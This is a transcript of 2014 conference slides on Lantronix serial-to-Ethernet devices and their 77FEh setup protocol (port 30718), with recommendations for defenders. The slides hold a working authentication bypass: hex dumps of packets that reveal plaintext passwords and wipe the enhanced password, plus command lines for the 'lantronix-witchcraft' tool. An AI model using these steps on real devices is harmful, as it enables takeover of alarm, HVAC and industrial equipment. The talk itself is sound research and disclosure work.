confidence 2014: vlatko kosturjak: exploring treasures of 77feh
TRANSCRIPT
1
MosEisleyLab
Confidence 2014
Exploring treasures of 77FEhGetting access to Lantronix devices
Vlatko Kosturjak, Diverto@k0st
2
MosEisleyLab
Who are you!?!!??
● Security Jedi at Diverto– Bringing balance to the force
● Experience– Offensive (Penetration tester)– Defensive (Developer/System Administrator/...)– Have code in: Nmap, Metasploit, OpenVAS, …– Author of free software: https://github.com/kost/
● If you trust in certificates– CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...
3
MosEisleyLab
Agenda
● Introduction - Lantronix● Physical access● WTF is 77FEh?● Vulnerabilities & Exploitation● Recommendations● Questions and answers
45 minutes
4
MosEisleyLab
Lantronix
Source: www.lantronix.com
5
MosEisleyLab
You can find them as integral part of
● Alarms● HVACs● Pool monitoring systems● Sprinkler controllers● Hacked vacuum cleaners - Roombas● Embedded systems● Industrial systems
Source:http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsArticle_Print&ID=904147&highlight
6
MosEisleyLab
What they are running actually?
● OS– CoBos (mostly)– Evolution OS/Linux– ThreadX– Linux
● Support– 1 or more serial ports– Modbus (few models)– 10/100 Ethernet
7
MosEisleyLab
Physical access
● Like usual– Game over
● Serial access– No password by design
● Requirements– Standard TTL cable– BusPirate– ...
8
MosEisleyLab
Connecting to serial port...
● 9600 bps 8/N/1● Flow control: None
9
MosEisleyLab
Most frequent services Available – TCP/IP
● Web (tcp/80)
● Telnet (tcp/9999)
● 77FEh (tcp-udp/30718)
● SNMP (udp/161)
Telnet administration interface
What is this?
Mostly information disclosures
Simple web serverServing applet JAR which talks
to 30718 port
10
MosEisleyLab
Device Discovery
● Ask :)● Look if you have physical access● Passive● Active/Scanning
– Standard port scanning is fine with conservative timing– Broadcast UDP to specific Lantronix ports (30718)
● Beware– Version scanning(-sV) or running vulnerability scanners
may misconfigure device–
11
MosEisleyLab
Telnet administration
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Password :
12
MosEisleyLab
So, WTF is 77FEh finally?
● 0x77FE = 30718 (10)● TCP/UDP protocol for device setup
– Proprietary protocol– Used by DeviceInstaller (proprietary software from
Lantronix)● Designed for
– Setup of device– Administration of device– Getting device info– Insecurity (sorry, had to write it, you'll see later ;) )
13
MosEisleyLab
Sample 77FEh communication
[v] Sending 4 bytes:
0x00000000 (00000) 000000f6 ....
[v] Received 30 bytes:
(00000) 000000f7 00108005 58324400 df0e0000 ........X2D.....
(00016) 62a7d944 00000000 00204a91 84fb b..D..... J...
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip>
Query setup request (4)
Query setup response (4) MAC address of the device (6)
Device type
14
MosEisleyLab
Interesting request – #1
● [v] Sending 4 bytes:● 0x00000000 (00000) 000000f8 ....●
● [v] Received 124 bytes:● 0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST● 0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L...........● 0x00000020 (00032) cc070000 00000000 00000000 00000000 ................● 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................● 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................● 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................● 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................● 0x00000070 (00112) 00000000 00000000 00000000 ............
Query setup (4)
SimplePassword
InPlaintext
(4)
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P <ip>
IPv4 (4)
15
MosEisleyLab
Previous – work
● Metasploit– Rob Vinson
● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-ethernet/● https://github.com/robvinson/metasploit-modules
– Metasploit modules for simple passwords by jgor● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_password● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_version
● Tools– Simple C program by jgor
● https://github.com/jgor/lantronix-telnet-pw
16
MosEisleyLab
But...
● Simple password is not set● Device still asks for password● Further digging
– Enhanced password in place– You cannot get/reset the enhanced password
easily– Length is bigger (4->16)– Challenge!!!
17
MosEisleyLab
Introduction to enhanced passwords
Source: Lantronix documentation
Feature/Type Simple Password Enhanced Password
Length 4 16
Visible in query setup
yes no
18
MosEisleyLab
Source:Mohdafri.com
19
MosEisleyLab
Interesting request - #2
[v] Sending 4 bytes:
0x00000000 (00000) 000000f4 ....
[v] Received 32 bytes:
0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST
0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3.........
0x00000020 (00032)
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C <ip>
SimplePassword
InPlaintext
(4)
Query ext versionRequest (4)
Version (6)
20
MosEisleyLab
Interesting request #3
● Request to query configuration
– 000000eX● Response to query
configuration– 000000bX +
followed by 126 bytes of setup
–
● X=number of setup records (0 – F):
– 0 basic setup record● Simple password, IP...
– 1 security record● Enhanced password,
AES key, SNMP...– 2 specific products /
situations– 3 OEMs– ...
Wrong! Request for security record 1 provides just zero bytes!
HALF
21
MosEisleyLab
Interesting request #4
● Request to change configuration
– 000000cX + followed by 126 bytes of setup
● Response to change configuration
– 000000bX–
● X=number of setup records (0 – F):
– 0 basic setup record
– 1 security record– 2 specific
products / situations
– 3 OEMs
22
MosEisleyLab
Setting setup record 1 for security
[v] Sending 130 bytes:
0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................
0x00000010 (00016) 00000000 00000000 00000000 00000000 ................
0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public....
0x00000030 (00048) 00000000 00000000 00000000 00000000 ................
0x00000040 (00064) 00000000 00000000 00000000 00000000 ................
0x00000050 (00080) 00000000 00000000 00000000 00000000 ................
0x00000060 (00096) 00000000 00000000 00000000 00000000 ................
0x00000070 (00112) 00000000 00000000 00000000 00000000 ................
0x00000080 (00128) 0000 ..
[v] Received 4 bytes:
0x00000000 (00000) 000000b1 ....
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E <ip>
Setting Setup record 1Was successful
Set Setup record 1(security) request
SNMPCommunityString (13)
EnhancedPassword
(16)
23
MosEisleyLab
Enhanced password goneno password to enter!
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Press Enter for Setup Mode
24
MosEisleyLab
Authentication Algorithm Guess
Authenticate
EnhancedPassword
SimplePassword
EnhancedNot set
Ask for enhanced
Ask for simple
Display setup menu
Enhancedset
Simpleset
SimpleNot set
PasswordOK
25
MosEisleyLab
New tool: lantronix-witchcraft
● 77FEh protocol implementation● 77FEh security related utility● All the tricks mentioned implemented● Free software: GPL2● Requirement: Perl● Available at
– https://github.com/kost/lantronix-witchcraft
26
MosEisleyLab
Basic usage:
● Display Mac address:
– ./lantronix-witchcraft.pl -Q <ip>
● Display Simple Password (up to 4 characters)
– ./lantronix-witchcraft.pl -P <ip>
● Reset Security record (together with enhanced password)
– ./lantronix-witchcraft.pl -E <ip>
● Reset Security record without AES (with enhanced password)
– ./lantronix-witchcraft.pl -S <ip>
● Dump setup records
– ./lantronix-witchcraft.pl -G -D <ip>
27
MosEisleyLab
Brave enough?
● One command to rule them all
● Display Mac address and simple password, dump setup records, reset security records together with enhanced password:
–
– ./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip>
●
28
MosEisleyLab
Still wondering why automatic scanning
is bad for Lantronix?●
● Dump of setup record:00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y|
00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0|
00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{|
00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0|
00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|
29
MosEisleyLab
Correct way
● Ask– Someone responsible if they could have something like that
● Send broadcast query packet to 77FEh● Identify ports 30718 open (TCP or UDP)● Dump setup records ● Play ;)● Check if it is still working...
– If yes, perfect– If not: huh, but you should restore setup records somehow ;)
30
MosEisleyLab
It's not about Lantronix...
● ...they warned the vendors about it in their documentation
Source: Lantronix documentation
31
MosEisleyLab
Disclosure Problem
● It's more about vendors who implement Lantronix in their devices
● Whom to report?– Lantronix – I guess they know their protocol ;)– OEMs – hard to find all their customers ;)
● Awareness– Conference– Tools
32
MosEisleyLab
But maybe it could be done...
● Add white list● Encryption/SSL?
Source: Lantronix documentation
33
MosEisleyLab
Recommendations
● Have some other device to VPN/SSL tunnel the services
● Telnet only through VPN or other secure channel to administration interface
● Disable 77FEh if not needed● Filter out 77FEh on network devices to only
allowed ones● Disable other unneccesary services (SNMP,
telnet, etc).
34
MosEisleyLab
Summary
Source: duki@fb
35
MosEisleyLab
Summary
● There are ways to pass beyond authentication (if 77FEh is enabled)– Simple passwords– Enhanced passwords
● Tools– Metasploit Lantronix modules– https://github.com/kost/lantronix-witchcraft
● Recommendations– Disable 77FEh if not needed or Filter out 77FEh on network devices to only
allowed ones– Tunnel VPN/SSL all communication to these devices
● Future– There are things to research: way to obtain enhanced password or AES keys
for example
36
MosEisleyLab
Acknowledgements - Thanks
● Previous work (Simple Passwords)– Rob Vinson
● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-ethernet/● https://github.com/robvinson/metasploit-modules
– Metasploit modules for simple passwords by jgor● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_password● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_version● https://github.com/jgor/lantronix-telnet-pw
● Colleagues– Dalibor Dosegović, hardware wizard
37
MosEisleyLab
Thank you!
Questions and Answers@k0st